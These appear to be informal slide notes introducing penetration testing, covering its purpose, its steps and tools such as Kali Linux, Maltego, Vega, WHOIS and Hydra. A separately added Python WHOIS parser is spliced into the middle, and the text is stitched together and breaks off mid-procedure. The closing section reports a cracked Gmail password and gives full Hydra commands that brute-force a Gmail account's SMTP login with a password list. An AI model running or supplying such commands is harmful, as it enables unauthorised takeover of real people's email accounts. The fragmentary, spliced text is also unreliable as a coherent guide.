penetration test paper

Penetration Testing

What is a penetration test? (informal)

  • Port scanning
  • Vulnerability Scanning
  • Penetration Testing

What is a penetration test?

  • A penetration test simulates an attack on a computer system or web application in order to reveal its vulnerabilities and the potential for an attacker to gain access to its functionality and data.
  • Some penetration tests are automated with an application, although other penetration tests can be done manually.

The process includes:

  • Trying to get the target data
  • Port scanning
  • Attempting to break in
  • Reporting back the findings

Why conduct a penetration test?

  • Test your security controls
  • Ensure system security
  • Prevent data breach
  • Get a baseline
  • Compliance

Steps of penetration test (informal)

  • Establish goal of the test
  • Information collection
  • Discovery
  • Vulnerability analysis
  • Taking control
      • Exploitation
      • Social engineering
  • Reporting
  • Evidence collection
  • Risk analysis
  • Remediation

Some Considerations

  • Scope must be defined
  • Testing can be done both internally and externally
  • The testing can be in-house or outsourced
  • White hat hacker
  • Black hat hacker

Steps of penetration test

The following are to be carried out during penetration testing:

  • Information Gathering
  • Configuration and Deployment Management Testing
  • Identity Management Testing
  • Authentication Testing
  • Authorization Testing
  • Data Validation Testing
  • Cryptography
  • Business Logic Testing
  • Client Side Testing

Steps of network penetration test

All the tests are carried out by qualified testers using known security software. Penetration tests are done to unearth vulnerabilities ranging from inappropriate system configurations to unknown hardware flaws.

Example of Pen Testing: Kali Linux

  • Kali Linux is a Debian-based distribution designed for forensics
  • Kali Linux is preinstalled with numerous penetration-testing programs.
  • From the creators of BackTrack comes Kali Linux, the most advanced penetration testing distribution created till now.

Penetration testing tools

  • Maltego: for the information gathering step
  • Hydra: for the brute force step
  • Vega: for vulnerability analysis
  • whois: for the information gathering step

In order to secure a very complex IT environment and ensure that business objectives are reached, threats to the company's major systems have to be dealt with so that the company continues being profitable and achieving its business and corporate goals. A penetration test is the use of automated and manual techniques to simulate attacks.

Maltego

  • Maltego is an open source intelligence and forensics application.

The scope of the test will cover both the internal and external environments.

The gray approach will be used for the system penetration.

The results will be unannounced and disclosed only to the top management.

WHOIS SERVICE

  • WHOIS is used to register the owners of websites
  • It is also used for a wider range of other information
  • The content in WHOIS is in a human-readable format
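
Because WHOIS content is human-readable text rather than a fixed data structure, reviewing it takes a small parser. The following is an added example, not part of the original slides: it parses a record into fields and lists the contact details that are not privacy-redacted, which is what an organisation would check about its own domain. The sample record, its field layout (which varies between registries) and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample record for the reserved domain example.com (not real registry output).
SAMPLE_WHOIS = """\
% Constructed WHOIS response for illustration
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Creation Date: 2001-02-03T04:05:06Z
Registry Expiry Date: 2031-02-03T04:05:06Z
Registrant Name: REDACTED FOR PRIVACY
Registrant Email: admin@example.com
Name Server: NS1.EXAMPLE.COM
Name Server: NS2.EXAMPLE.COM
>>> Last update of WHOIS database: 2024-01-01T00:00:00Z <<<
NOTICE: The data in this record is provided for information purposes only.
"""

# "Key: value" line; the key stops at the first colon so timestamps stay intact.
FIELD = re.compile(r"^\s*([A-Za-z][A-Za-z /-]*?)\s*:\s*(.*\S)\s*$")


def parse_whois(text):
    """Return {field: [values]}; keys are lower-cased, repeated keys are kept."""
    record = defaultdict(list)
    for line in text.splitlines():
        if line.startswith(">>>"):
            break  # everything after the trailer is legal boilerplate
        if not line.strip() or line.lstrip().startswith(("%", "#")):
            continue  # blank lines and server comments
        m = FIELD.match(line)
        if m:
            record[m.group(1).lower()].append(m.group(2))
    return dict(record)


def exposed_contacts(record):
    """List registrant/admin/tech values that are not privacy-redacted."""
    roles = ("registrant", "admin", "tech")
    return sorted(
        (key, value)
        for key, values in record.items() if key.startswith(roles)
        for value in values if "redacted" not in value.lower()
    )


if __name__ == "__main__":
    rec = parse_whois(SAMPLE_WHOIS)
    print(rec["name server"], exposed_contacts(rec))
```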

Vega

  • This is an open source testing platform used to test the security of applications
  • Vega is used to test for SQL injection and cross-site scripting (XSS)
  • It is written in Java, GUI based, and runs on Linux, OS X, and Windows

3- Hydra found Gmail password: 11111111

4- Or you can go to the command line terminal and type:

hydra -S -l [email protected] -P /root/Desktop/pass4.txt -V -s 465 smtp.gmail.com smtp

Or type:

hydra -s 465 -S -V -l [email protected] -P/root/Desktop/pass4.txt -e s -t 36 -w 36 smtp.gmail.com smtp
